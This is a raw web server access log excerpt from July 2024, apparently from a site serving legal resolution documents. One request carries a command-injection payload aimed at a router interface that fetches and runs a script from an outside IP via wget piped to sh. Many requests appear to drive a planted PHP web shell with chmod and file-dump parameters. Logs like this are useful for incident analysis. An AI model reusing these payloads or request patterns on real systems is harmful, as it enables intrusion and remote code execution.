47.128.36.204 - - [13/Jul/2024:14:34:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=sess_ik1509uasp78qvmbar6tljso70 HTTP/1.1" 200 2714
31.220.1.83 - - [13/Jul/2024:14:34:14 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.69%2Ft+-O-+|+sh%60) HTTP/1.1" 404 1018
201.245.192.253 - - [13/Jul/2024:14:32:09 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 29372
47.128.21.211 - - [13/Jul/2024:14:34:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&base64=2&f=misc.php HTTP/1.1" 200 2739
201.245.192.253 - - [13/Jul/2024:14:34:25 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38712
47.128.34.219 - - [13/Jul/2024:14:34:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=RESOLUCION+2410+DE+2010.PDF HTTP/1.1" 200 2714
47.128.35.175 - - [13/Jul/2024:14:34:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=6574.pdf HTTP/1.1" 200 2714
47.128.120.161 - - [13/Jul/2024:14:35:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=RESOLUCION+7837+DE+2010.PDF HTTP/1.1" 200 2765
201.245.192.253 - - [13/Jul/2024:14:35:02 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
52.167.144.203 - - [13/Jul/2024:14:35:04 -0500] "GET /Publicaciones/2024EE41578.pdf HTTP/1.1" 404 227
47.128.61.213 - - [13/Jul/2024:14:35:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=5895.pdf HTTP/1.1" 200 2714
47.128.21.220 - - [13/Jul/2024:14:35:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=jquery.table-hotkeys.min.js&fullhexdump=1 HTTP/1.1" 200 2754
47.128.24.31 - - [13/Jul/2024:14:35:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&base64=3&f=bpanel.txt HTTP/1.1" 200 2739
47.128.124.70 - - [13/Jul/2024:14:35:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=7348.pdf HTTP/1.1" 200 2714
47.128.35.119 - - [13/Jul/2024:14:35:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=7628.pdf HTTP/1.1" 200 2714
47.128.35.100 - - [13/Jul/2024:14:35:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=RESOLUCION+6522+DE+2010.PDF HTTP/1.1" 200 2714
47.128.55.210 - - [13/Jul/2024:14:36:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=7584.pdf HTTP/1.1" 200 2740
201.245.192.253 - - [13/Jul/2024:14:36:02 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [13/Jul/2024:14:36:11 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9738
47.128.29.52 - - [13/Jul/2024:14:36:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=6160.pdf HTTP/1.1" 200 2740
66.249.66.20 - - [13/Jul/2024:14:36:35 -0500] "GET /BLA/resoluciones/AUTOS%202023/03681.pdf HTTP/1.1" 304 -
216.245.221.92 - - [13/Jul/2024:14:36:36 -0500] "HEAD / HTTP/1.1" 200 -
